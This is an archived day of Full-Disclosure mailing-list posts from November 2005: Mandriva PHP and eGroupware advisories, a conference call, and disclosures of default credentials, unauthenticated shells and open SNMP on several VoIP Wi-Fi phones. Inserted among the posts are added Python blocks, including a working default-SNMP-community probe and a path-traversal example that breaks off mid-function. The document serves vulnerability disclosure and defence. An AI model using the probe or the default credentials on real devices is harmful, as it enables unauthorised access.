[Full-disclosure] MDKSA-2005:213 - Updated php packages fix multiple vulnerabilities

2005-11-16 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:213
 http://www.mandriva.com/security/
 ___
 
 Package : php
 Date: November 16, 2005
 Affected: 10.1, 10.2, 2006.0, Corporate 2.1, Corporate 3.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A number of vulnerabilities were discovered in PHP:
 
 An issue with fopen_wrappers.c would not properly restrict access to
 other directories when the open_basedir directive included a trailing
 slash (CVE-2005-3054); this issue does not affect Corporate Server 2.1.
 
 An issue with the apache2handler SAPI in mod_php could allow an
 attacker to cause a Denial of Service via the session.save_path option
 in an .htaccess file or VirtualHost stanza (CVE-2005-3319); this issue
 does not affect Corporate Server 2.1.
 
 A Denial of Service vulnerability was discovered in the way that PHP
 processes EXIF image data which could allow an attacker to cause PHP
 to crash by supplying carefully crafted EXIF image data
 (CVE-2005-3353).
 
 A cross-site scripting vulnerability was discovered in the phpinfo()
 function which could allow for the injection of javascript or HTML
 content onto a page displaying phpinfo() output, or to steal data such
 as cookies (CVE-2005-3388).
 
 A flaw in the parse_str() function could allow for the enabling of
 register_globals, even if it was disabled in the PHP configuration
 file (CVE-2005-3389).
 
 A vulnerability in the way that PHP registers global variables during
 a file upload request could allow a remote attacker to overwrite the
 $GLOBALS array which could potentially lead to the execution of arbitrary
 PHP commands.  This vulnerability only affects systems with
 register_globals enabled (CVE-2005-3390).
 
 The updated packages have been patched to address these issues.  Once the
 new packages have been installed, you will need to restart your Apache
 server using "service httpd restart" in order for the new packages to
 take effect ("service httpd2-naat restart" for MNF2).
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3054
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3319
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3353
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3389
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390
 http://www.hardened-php.net/advisory_202005.79.html
 http://www.hardened-php.net/advisory_192005.78.html
 http://www.hardened-php.net/advisory_182005.77.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.1:
 3966e335bc3a2ae6dffbbc8e83575865  
10.1/RPMS/libphp_common432-4.3.8-3.6.101mdk.i586.rpm
 199fa9e0baf46bda77e660555626ed4e  
10.1/RPMS/php432-devel-4.3.8-3.6.101mdk.i586.rpm
 05ef30fa2004ffd60f4519fd41a444e3  10.1/RPMS/php-cgi-4.3.8-3.6.101mdk.i586.rpm
 fe48fbbb47b3bcdab5054ffdd2067b6a  10.1/RPMS/php-cli-4.3.8-3.6.101mdk.i586.rpm
 90b47f8c1515b5043d513db11d6607ca  10.1/SRPMS/php-4.3.8-3.6.101mdk.src.rpm

 Mandriva Linux 10.1/X86_64:
 9fe206e55dca158523dab0a85f1a5dec  
x86_64/10.1/RPMS/lib64php_common432-4.3.8-3.6.101mdk.x86_64.rpm
 d36a3e7f90980388196aa58b6dbb94af  
x86_64/10.1/RPMS/php432-devel-4.3.8-3.6.101mdk.x86_64.rpm
 416b3bacf2b57f1a9cae5ca172e39135  
x86_64/10.1/RPMS/php-cgi-4.3.8-3.6.101mdk.x86_64.rpm
 0c27298aadb7d0a847a93316ce4d9d57  
x86_64/10.1/RPMS/php-cli-4.3.8-3.6.101mdk.x86_64.rpm
 90b47f8c1515b5043d513db11d6607ca  
x86_64/10.1/SRPMS/php-4.3.8-3.6.101mdk.src.rpm

 Mandriva Linux 10.2:
 e972e5e5cadb586a390a39bffa1cb56e  
10.2/RPMS/libphp_common432-4.3.10-7.4.102mdk.i586.rpm
 c26646613d41a7f3e82b5d2d11c21b7c  
10.2/RPMS/php432-devel-4.3.10-7.4.102mdk.i586.rpm
 098e0a1e4b8b597bf95461fc085c037a  10.2/RPMS/php-cgi-4.3.10-7.4.102mdk.i586.rpm
 99f0eaa02942f7b6753309ca56979100  10.2/RPMS/php-cli-4.3.10-7.4.102mdk.i586.rpm
 7df363e2e2309ec26b40c3490a0d75ae  10.2/SRPMS/php-4.3.10-7.4.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 d9d33311690b0c5f69e3834a5ba6bc10  
x86_64/10.2/RPMS/lib64php_common432-4.3.10-7.4.102mdk.x86_64.rpm
 f5d2b45ace0ab4208ba911159a47e429  
x86_64/10.2/RPMS/php432-devel-4.3.10-7.4.102mdk.x86_64.rpm
 0c7e0acb3bd80a9a7220ecf919b3d795  
x86_64/10.2/RPMS/php-cgi-4.3.10-7.4.102mdk.x86_64.rpm
 7df6f5a5b19c07e9fa3d6851f210f847  
x86_64/10.2/RPMS/php-cli-4.3.10-7.4.102mdk.x86_64.rpm
 7df363e2e2309ec26b40c3490a0d75ae  
x86_64/10.2/SRPMS/php-4.3.10-7.4.102mdk.src.rpm

 Mandriva Linux 2006.0:
 826c36fdb07b7c341a39507b679e31a9  
2006.0/RPMS/libphp5_common5-5.0.4-9.1.20060mdk.i586.rpm
 2be5d91979fa3c8f77744a86fee8a423  
2006.0/RPMS/php-cgi-

[Full-disclosure] MOCM deadline

2005-11-16 Thread mayhem
Thinking it is interesting, I'm forwarding it hoping someone will find it
useful.

> Metro Olografix cultural telematics association, for the second edition
> of the MOCM (Metro Olografix Crypto Meeting) that will take place in
> Pescara approximately between the end of January and the beginning of
> February 2006, invites all those who may be interested in making a
> speech at the event to submit their description by email at the address
> [EMAIL PROTECTED] before December 15th, 2005.
> 
> Speeches firstly considered will be about:
> 
> - Study of cryptographic algorithms and cryptoanalysis techniques
> - Steganography and information hiding
> - Anonymization services
> - Innovative programs, systems or solutions using cryptographic techniques
> - Political, socio-cultural and legal aspects of the discussed topics
> - Analysis of "Webs of Trust"
> - Cryptography applications in the telecommunication networks field
> 
> Speeches about other particularly relevant topics will also be considered.
> 
> The authors will be immediately contacted, confirming the successful
> reception of the material they have sent. The list of the speeches
> selected for the event will be published by the first week of January.
> 
> Further information about the MOCM will be available on the association
> web site at the address www.olografix.org; alternatively, you may send
> your request by email at the address [EMAIL PROTECTED], specifying
> 'MOCM information request' in the subject.


-- 
Dan: Everybody wants to be happy. 
Larry: Depressives don't. They want to be unhappy to confirm they're
depressed. If they were happy they couldn't be depressed anymore. They'd
have to go out into the world and live. Which can be depressing.
https://www.recursiva.org - Key on pgp.mit.edu ID B88FE057

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Administrivia: Noise

2005-11-16 Thread n3td3v
## Security Community statement by n3td3v

As the real n3td3v I would like to join John Cartwright in his calls
for calm during this difficult time. Obviously on the date mentioned
where emotions were running high things were said that might not have
been appropriate in retrospect of events.

The carnage that followed in follow up threads have left the list in
an improper state, due to individuals creating mock web pages on their
server. It would be great if users of the list could move on with
topics of better natures to allow for better balancing of message flow
in respect of the proper reason the list exists.

I take full responsibility for sparking off the wave of secondary
threads and make my apologies to working professionals who have not
appreciated the influx of n3td3v related hatred threads being mass
produced by the lesser intellectual members of the list.

## Auto Responders this Winter

With this I would like to wish all decent members of the list who
never post and just observe proceedings a very merry happy holidays
during your festive breaks, which are upcoming in future weeks.

Just remember to change your settings at the grok.org.uk website, so
people posting to the list over the coming weeks, won't be attacked by
your auto-responder, "I'm out of office until January 10th" message.

## Outside Influences

To finish up, outside contributory factors were involved with
behaviours set by myself on said date for outrage. Not everything you
see on list is the full picture of off list conditions and states of
mind with influences of substances the user may have been taking a
part in consuming of inappropriate levels within the blood stream.

## Planned Suicide of n3td3v name

I have already finished destroying all respect the brand name "n3td3v"
ever had by plunging the credibility of the name into disrepute
by acting in bad natures on this list.

I now look to removing n3td3v web site, n3td3v mailing list, n3td3v
blog, all n3td3v user accounts on the internet on Yahoo, MSN, Google,
Digg, C|NET and others, along with messenger and e-mail list contacts
of people.

The suicide of the n3td3v name is complete now, as was planned to
happen before the weekend, where events took place.

## Prior Notification was made

An e-mail was sent to Yahoo's core security team to notify them the
n3td3v name wasn't coming back and that an attempt to close it up
would be made over the weekend.

## Upcoming Security business ventures

I now announce the death of n3td3v, as planned by myself and others, to
further allow the progression of a new site and direction of planned
security business being setup.

I will be around the security community on a professional capacity in
the future (As my real name), to better contribute to the security and
internet community.

## Coffin Nailed

R.I.P. n3td3v


On 11/15/05, John Cartwright <[EMAIL PROTECTED]> wrote:
> Hi
>
> If we could all make an effort to avoid further personal attacks I
> would appreciate it. Please resist the temptation to perpetuate the
> noise - I have mailed individuals privately about the current
> situation in an attempt to prevent further offtopic postings.
>
> As has been said before, every list member is entitled to an opinion,
> providing they are prepared to express it in a constructive manner. I
> do not wish to impose any moderation unless absolutely necessary.
>
> Cheers
> - John


RE: [Full-disclosure] freeftpd USER bufferoverflow

2005-11-16 Thread ad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

What a leet poc so 

- -Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On behalf of KF (lists)
Sent: Wednesday, 16 November 2005 14:31
To: full-disclosure@lists.grok.org.uk
Subject: re: [Full-disclosure] freeftpd USER bufferoverflow

The default configuration is not vulnerable unless the Logging option 
"Log events" is checked.

- -KF



[Full-disclosure] Senao SI-680H VoIP Wifi phone undocumented open port

2005-11-16 Thread Shawn Merdinger
I disclosed today the following vulnerability at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger

===

VENDOR:
Senao

VENDOR NOTIFIED:
28 June, 2005

VENDOR RESPONSE:
None

PRODUCT:
Senao SI-680H VOIP WIFI Phone
http://www.senao.com/english/product/product_wired_dsl_1.asp?tp1id=03&tp2id=02&proid=000186

SOFTWARE VERSION:
Current Firmware Version 0.03.0839
Current Firmware Date 2005.04.20
Current BSP Version V 2_2_1/37 Feb 11 2005,12:26:46d
Hardware version 1.7.0

A.  VULNERABILITY TITLE:
Senao SI-680H VOIP WIFI phone undocumented open port UDP/17185

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
1. An undocumented open port, UDP/17185 (VxWorks WDB remote debugging,
wdbrpc), is left in from development. This open port may allow an
attacker unauthenticated access to the phone's OS, perhaps yielding
sensitive information, creating opportunities for DoS, etc.

There appears to be no workaround for disabling this open port.


[Full-disclosure] Zyxel P2000W (Version1) VoIP Wifi phone multiple vulnerabilties

2005-11-16 Thread Shawn Merdinger
I disclosed today the following vulnerabilities at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger

===
VENDOR:
Zyxel

PRODUCT:
Zyxel P2000W Version 1 VOIP WIFI Phone
http://www.zyxel.com/product/P2000W.php

SOFTWARE VERSION:
Wj.00.10
Feb 05 2005

VENDOR NOTIFIED:
28 June, 2005

VENDOR RESPONSE:
None

A.  VULNERABILITY TITLE:
Zyxel P2000W v.1 VOIP WIFI Phone undocumented port UDP/9090

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The Zyxel P2000W v.1 VOIP WIFI phone has an undocumented port,
UDP/9090, that provides an unauthenticated attacker information about
the phone, specifically the phone's MAC address and software version
is returned upon connection. An attacker can use this vulnerability to
easily identify the phone and software version. Also, the undocumented
open port may provide an avenue for DoS. There appears to be no
workaround for this issue.

B.  VULNERABILITY TITLE:
Zyxel P2000W v.1 VOIP WIFI Phone uses hardcoded DNS servers

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The Zyxel P2000W v.1 VOIP WIFI phone uses hardcoded DNS servers located
in Taiwan for the phone's DNS configuration.

Primary DNS IP is 168.95.1.1 resolving to dns.hinet.net
Secondary DNS IP is 139.175.55.244 resolving to dns.seed.net.tw

This configuration places every ZyXel phone using this software at
risk of unintentional DoS if the DNS servers in Taiwan become
unavailable.  If the DNS servers are compromised, all Zyxel phone
users worldwide are vulnerable to being redirected to malicious SIP
servers, etc. For a temporary workaround users can manually input the
IP address of a known, trusted DNS server via the keyboard at each
phone start when configured for DHCP or PPPoE, however, this will not
persist once the phone is restarted.


[Full-disclosure] UTstarcom F1000 VoIP Wifi phone multiple vulnerabilities

2005-11-16 Thread Shawn Merdinger
I disclosed today the following vulnerabilities at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger
===

VENDOR:
UTStarcom

VENDOR NOTIFIED:
27 June, 2005 via [EMAIL PROTECTED]

VENDOR RESPONSE:
None

PRODUCT:
UTStarcom F1000 VOIP WIFI Phone
http://www.utstar.com/Solutions/Handsets/WiFi/

SOFTWARE VERSION:
s2.0
VxWorks (for Hornet VoWifi, ARM946ES (LE)
Factory Firmware) version 5.5.1.
Kernel: WIND version 2.6.
Made on Apr 5 2005, 14:49:39.

A.  VULNERABILITY TITLE:
UTStarcom F1000 VoIP Wifi phone SNMP daemon has default public read
credentials and the daemon cannot be disabled

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
UTstarcom F1000 SNMP daemon default public credentials allows an
attacker with access to the phone's SNMP daemon to read the phone's
SNMP configuration. This can lead to sensitive information disclosure.
In addition, the daemon's read/write credentials cannot be changed,
nor can the daemon be disabled via the phone's physical interface
(i.e. via keypad input). During testing, the SNMP daemon appeared to
consistently die when connecting via snmpwalk, requiring a reboot of the
phone in order to restore SNMP service.

B. VULNERABILITY TITLE:
UTstarcom F1000 VoIP Wifi Phone telnet server has known default
user/password credentials

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The phone's operating system is Wind River's Vxworks. Default
credentials for this OS are publicly known to be target/password.

By default, the telnet daemon is listening on the phone (TCP port 23)
providing WIFI network access to the phone's OS. Attackers can telnet
to the phone and gain access to the phone's Vxworks OS using the known
default credentials.

Impact is full access to the Vxworks OS, including debugging, direct
memory dumping/injection, read/write device, user and network
configuration files, enable/disable/restart services, remote reboot. 
For a workaround, the default login/password can be changed.

C. VULNERABILITY TITLE:
UTstarcom F1000 VoIP Wifi Phone rlogin (TCP/513) unauthenticated access

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The phone's rlogin port TCP/513 is listening by default and requires
no authentication.  An attacker connecting to the phone via
telnet/netcat is dropped into a shell without any login.  The shell
provides an attacker full access to the Vxworks OS, including
debugging, direct memory dumping/injection, read/write device, user
and network configuration files, enable/disable/restart services,
remote reboot.

There appears to be no workaround as neither the service can be
disabled, nor can authentication to rlogin be enabled.


[Full-disclosure] Hitachi IP5000 VoIP Wifi phone multiple vulnerabilities

2005-11-16 Thread Shawn Merdinger
I disclosed today the following vulnerabilities at the 32nd CSI
conference in Washington, D.C.


Thanks,
Shawn Merdinger

===
VENDOR:
Hitachi

PRODUCT:
Hitachi IP5000 VOIP WIFI Phone
http://www.wirelessip5000.com/

SOFTWARE VERSION:
v1.5.6

VENDOR NOTIFIED:
28 June, 2005

VENDOR RESPONSE:
None.  However, issues addressed at
http://www.hitachi-cable.co.jp/ICSFiles/infosystem/security/76659792_e.pdf

A.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI Phone handset hardcoded administrator password

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
1.  The Hitachi VOIP WIFI phone handset has a default administrator
password of "" that the user enters in order to access
administrator functions when
programming the handset via the physical keys. This password appears to be
hardcoded and presents a physical vulnerability. If an attacker can physically
access the phone (borrow, phone rental scenario, theft, etc.) the attacker can
derive sensitive information and modify the phone's configuration. There
appears to be no workaround for this vulnerability.

B.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI phone HTTP server vulnerabilities

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:
The HTTP server (port TCP/8080) on the Hitachi IP5000 phone has two security
issues:

1. Improper information disclosure: The HTTP daemon default index page
discloses what the device is (Hitachi IP5000 phone), the phone software
versions, phone MAC address, IP address and routing information. An
attacker can use this to discover quickly what the device is and see if there
are any associated vulnerabilities. Also, the disclosure of the phone's
routing/gateway information can provide an attacker with information for a
DoS attack. An attacker does not need to authenticate to the phone to obtain
this information from the index page. Workaround is to disable the HTTP
server via the phone's physical interface or via the HTTP interface.

2. Web server default configuration does not require credentials to
authenticate.
This allows an attacker to access any of the various configuration pages of the
phone, changing the phone configuration, etc. Workaround is to disable the
HTTP server via the phone's physical interface or via the HTTP interface. The
phone user may also set a password via the HTTP interface. Note that the
password set page does not require the previous password (an attacker could
lock out a user if the initial password is not set), nor does it require the new
password to be entered twice (to avoid fat-fingering).

C.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI Phone SNMP daemon vulnerabilities

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:

1. The Hitachi IP5000 VOIP WIFI phone SNMP v1/v2c daemon allows
read/write access to the phone's SNMP configuration using any credentials. An
attacker can use this vulnerability to access the phone's SNMP configuration,
potentially reading/writing/erasing sensitive information. There seems to be no
workaround as it appears that the SNMP daemon can neither be disabled, nor
can the SNMP daemon read/write strings be modified by the phone user.

D.  VULNERABILITY TITLE:
Hitachi IP5000 VOIP WIFI Phone undocumented port TCP/3390 Unidata Shell

VULNERABILITY DETAILS, IMPACT AND WORKAROUND:

1.  The Hitachi IP5000 phone has an undocumented open port, TCP/3390, that
provides an unauthenticated attacker access to the Unidata Shell created upon
connection. This may allow an attacker to access sensitive information and
potentially impact the phone's operations in a DoS. As a workaround, there
appears to be no means to disable this port and service, so no workaround
appears possible.
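
The UTStarcom F1000 entry (A, an SNMP daemon answering the default "public"
community) and the Hitachi IP5000 entry (C, an SNMP v1/v2c daemon accepting any
community string) both come down to the same check: does the agent answer a
guessed community? The Python below is an added example, not part of Shawn
Merdinger's advisories and not vendor code. It hand-builds an SNMPv1 GetRequest
for sysDescr.0 using RFC 1157 BER encoding, parses the GetResponse, and wraps
that in a one-shot UDP probe. The sample agent reply, the banner text and the
placeholder phone address are constructed for illustration; the probe sends a
single GET rather than a walk because the F1000 advisory reports its daemon
dying under snmpwalk.

```python
"""Minimal SNMPv1 (RFC 1157) GET builder / response parser for a community-string check."""
import socket

SYS_DESCR_OID = (1, 3, 6, 1, 2, 1, 1, 1, 0)   # sysDescr.0


def _ber_len(n):
    """BER length: short form below 128, long form (0x8N + N octets) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag, payload):
    return bytes([tag]) + _ber_len(len(payload)) + payload

def _encode_int(value):
    n = max(1, (value.bit_length() + 8) // 8)      # minimal two's-complement width
    return _tlv(0x02, value.to_bytes(n, "big", signed=True))

def _encode_oid(oid):
    body = bytes([oid[0] * 40 + oid[1]])           # first two arcs share one octet
    for arc in oid[2:]:
        chunk = bytes([arc & 0x7F])
        while arc >> 7:                            # base-128, continuation bit on all but last
            arc >>= 7
            chunk = bytes([0x80 | (arc & 0x7F)]) + chunk
        body += chunk
    return _tlv(0x06, body)

def _message(pdu_tag, community, request_id, varbinds):
    vb_list = b"".join(_tlv(0x30, _encode_oid(oid) + value) for oid, value in varbinds)
    pdu = _tlv(pdu_tag, _encode_int(request_id) + _encode_int(0) + _encode_int(0)
               + _tlv(0x30, vb_list))              # request-id, error-status, error-index, varbinds
    return _tlv(0x30, _encode_int(0) + _tlv(0x04, community.encode()) + pdu)   # version 0 = v1

def build_get_request(community, oid=SYS_DESCR_OID, request_id=1):
    """GetRequest-PDU (tag 0xA0) for one OID, its value slot filled with NULL."""
    return _message(0xA0, community, request_id, [(oid, _tlv(0x05, b""))])

def build_get_response(community, request_id, oid, text):
    """Constructed sample agent reply (GetResponse-PDU, tag 0xA2); exercises the parser offline."""
    return _message(0xA2, community, request_id, [(oid, _tlv(0x04, text.encode()))])

def _read_tlv(buf, pos):
    """Return (tag, payload, position just after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(payload):
    arcs, value = [payload[0] // 40, payload[0] % 40], 0
    for b in payload[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return tuple(arcs)

def parse_get_response(datagram):
    """Return (request_id, error_status, [(oid, value), ...]); ValueError if not a GetResponse."""
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, _version, pos = _read_tlv(msg, 0)
    _, _community, pos = _read_tlv(msg, pos)
    tag, pdu, _ = _read_tlv(msg, pos)
    if tag != 0xA2:
        raise ValueError("not a GetResponse PDU")
    _, rid, pos = _read_tlv(pdu, 0)
    _, err, pos = _read_tlv(pdu, pos)
    _, _index, pos = _read_tlv(pdu, pos)
    _, vb_list, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vb_list):
        _, vb, pos = _read_tlv(vb_list, pos)
        _, oid_raw, vpos = _read_tlv(vb, 0)
        vtag, raw, _ = _read_tlv(vb, vpos)
        if vtag == 0x04:                           # OCTET STRING (sysDescr is one)
            value = raw.decode("latin-1")
        elif vtag == 0x02:                         # INTEGER
            value = int.from_bytes(raw, "big", signed=True)
        else:
            value = raw                            # anything else is left as raw bytes
        varbinds.append((_decode_oid(oid_raw), value))
    return int.from_bytes(rid, "big", signed=True), int.from_bytes(err, "big", signed=True), varbinds

def probe_default_community(host, community="public", port=161, timeout=2.0):
    """Send one sysDescr.0 GetRequest; return the sysDescr string if the agent accepts this
    community, else None.  One GET, not a walk: the F1000 advisory reports its daemon dying
    under snmpwalk.  Network I/O, so not exercised by the offline test."""
    request_id = 0x1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_get_request(community, request_id=request_id), (host, port))
        try:
            rid, err, varbinds = parse_get_response(sock.recvfrom(4096)[0])
        except (socket.timeout, ValueError, IndexError):
            return None
    if rid != request_id or err != 0 or not varbinds:
        return None
    return varbinds[0][1]                          # e.g. a "VxWorks ..." banner on the phones above
```

Run probe_default_community("<phone-ip>") from a host on the same WLAN; a
non-None return means the agent answered that community and handed back its
sysDescr, which on these handsets is also the quickest fingerprint of the
firmware. Try "private" as well where the advisory mentions read/write access.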


[Full-disclosure] MDKSA-2005:212 - Updated egroupware packages to address phpldapadmin, phpsysinfo vulnerabilities

2005-11-16 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:212
 http://www.mandriva.com/security/
 ___
 
 Package : egroupware
 Date: November 16, 2005
 Affected: Corporate 3.0
 ___
 
 Problem Description:
 
 Egroupware contains embedded copies of several php based projects,
 including phpldapadmin and phpsysinfo. 
 
 Phpldapadmin before 0.9.6c allows remote attackers to gain anonymous
 access to the LDAP server, even when disable_anon_bind is set, via an
 HTTP request to login.php with the anonymous_bind parameter set.
 (CAN-2005-2654)
 
 Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6
 and 0.9.7 allows remote attackers to read arbitrary files via a ..
 (dot dot) in the custom_welcome_page parameter. (CAN-2005-2792)
 
 PHP remote code injection vulnerability in welcome.php in phpLDAPadmin
 0.9.6 and 0.9.7 allows remote attackers to execute arbitrary PHP code
 via the custom_welcome_page parameter. (CAN-2005-2793)
 
 Maksymilian Arciemowicz discovered several cross site scripting issues
 in  phpsysinfo, a PHP based host information application.
 (CAN-2005-0869, CAN-2005-0870)
 
 Christopher Kunz discovered that local variables in phpsysinfo get
 overwritten unconditionally and are trusted later, which could lead to
 the inclusion of arbitrary files. (CAN-2005-3347)
 
 Christopher Kunz discovered that user-supplied input in phpsysinfo is
 used unsanitised, causing a HTTP Response splitting problem.
 (CAN-2005-3348)
 
 The updated packages have new versions of these subsystems to correct
 these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2654
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2792
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2793
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0869
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0870
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3347
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3348
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 ede368f20b1e00144278800d3b6bf468  
corporate/3.0/RPMS/egroupware-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 8260713a9c28f6f7c7b08630af98b80c  
corporate/3.0/RPMS/egroupware-addressbook-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 053e62d63d08566a51f5a4caed575920  
corporate/3.0/RPMS/egroupware-backup-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 9d2a654955fd2dc83f965366a2af77a0  
corporate/3.0/RPMS/egroupware-bookmarks-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 ee1d890db9e37afaa9ddd5caeab02223  
corporate/3.0/RPMS/egroupware-calendar-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 26ecafedde93c891562ed679f833f1f0  
corporate/3.0/RPMS/egroupware-comic-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 eecee2ff5e2c5beb36c4592235227d9d  
corporate/3.0/RPMS/egroupware-developer_tools-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 153f3f86f72b627c3f12eb44715a01fd  
corporate/3.0/RPMS/egroupware-email-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 3863031cfccf6ba411ae8965b4e13af0  
corporate/3.0/RPMS/egroupware-emailadmin-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 260713edaf667a6c0af01afe5cf1276f  
corporate/3.0/RPMS/egroupware-etemplate-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 a3ae6cc74fb5191f41a7e602741a  
corporate/3.0/RPMS/egroupware-felamimail-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 a95d31bb108a6126d3187af8c77c2164  
corporate/3.0/RPMS/egroupware-filemanager-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 772a8690091f509727ef70f6b363d6bf  
corporate/3.0/RPMS/egroupware-forum-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 e97692f7a5c888e4ea1a86236c9bd124  
corporate/3.0/RPMS/egroupware-ftp-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 c9a5f4a17bf1697e7eb5e1e6421a6ff3  
corporate/3.0/RPMS/egroupware-fudforum-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 d8a9513798c91e6cbd39667fa04784ff  
corporate/3.0/RPMS/egroupware-headlines-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 87f25244c8af456bf43c66650dbc05e6  
corporate/3.0/RPMS/egroupware-infolog-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 67fc3ed193d9e5a5b5e3d0ab4b3b21af  
corporate/3.0/RPMS/egroupware-jinn-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 0c4a7125fa56f7e2c62b37c0e9657fda  
corporate/3.0/RPMS/egroupware-messenger-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 7c59389b480bab742b74a7fa3c304e08  
corporate/3.0/RPMS/egroupware-news_admin-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 ccc1a38a19f371b24014c078fd270640  
corporate/3.0/RPMS/egroupware-phpbrain-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 4d08c9988a1a8b371dbb8e775f10ead5  
corporate/3.0/RPMS/egroupware-phpldapadmin-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 49e15a21e9649192aec8a094fbd6ba23  
corporate/3.0/RPMS/egroupware-phpsysinfo-1.0-0.RC3.1.1.C30mdk.noarch.rpm
 449fc4f64a2684e801026551d10775a6  
corporate/3.0/RPMS/egroupware-polls-1.0-0.RC3.1.1.C30mdk.noarch
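
The two phpLDAPadmin issues above (CAN-2005-2792 and CAN-2005-2793) are one
root cause seen from two sides: welcome.php handed the custom_welcome_page
request parameter to include(), so a ".." sequence reached files outside the
application directory and, with URL wrappers enabled, a remote URL reached PHP
code the attacker controls. The following is an added example, not
phpLDAPadmin's or eGroupware's code, written in Python rather than PHP: a
resolver that mirrors the flawed pattern beside a hardened one that pins the
page to a directory and rejects wrapper schemes. PAGE_ROOT, the allowed
suffixes and the sample page names are assumptions made for illustration.

```python
"""Resolving a user-supplied page name safely.  Added example, not project code."""
import os
from urllib.parse import urlsplit

PAGE_ROOT = "/srv/app/welcome_pages"          # assumed directory of bundled welcome pages
ALLOWED_SUFFIXES = (".html", ".php")          # assumed allow-list of page types


def vulnerable_resolve(page_root, requested):
    """Mirror of the flawed pattern: the request value is joined to the page directory
    with no checks.  '..' walks out of the directory, and an absolute value makes
    os.path.join discard page_root altogether.  PHP's include() goes one step further:
    a 'http://...' value is fetched and executed, which this Python cannot reproduce."""
    return os.path.normpath(os.path.join(page_root, requested))


def check_page_name(page_root, requested):
    """Return (accepted, path_or_reason).  Accepts only a relative name that, after
    symlink and '..' resolution, still lies inside page_root."""
    if not requested:
        return False, "empty page name"
    if "\x00" in requested:
        return False, "NUL byte in page name"          # truncation trick against C-level open()
    if urlsplit(requested).scheme:
        return False, "URL / stream wrapper rejected"  # http://, php://, data:, ...
    if os.path.isabs(requested):
        return False, "absolute path rejected"
    if not requested.endswith(ALLOWED_SUFFIXES):
        return False, "file type not allowed"
    root = os.path.realpath(page_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return False, "path escapes page root"          # catches a/../../x and symlink hops
    return True, candidate


def safe_page_path(page_root, requested):
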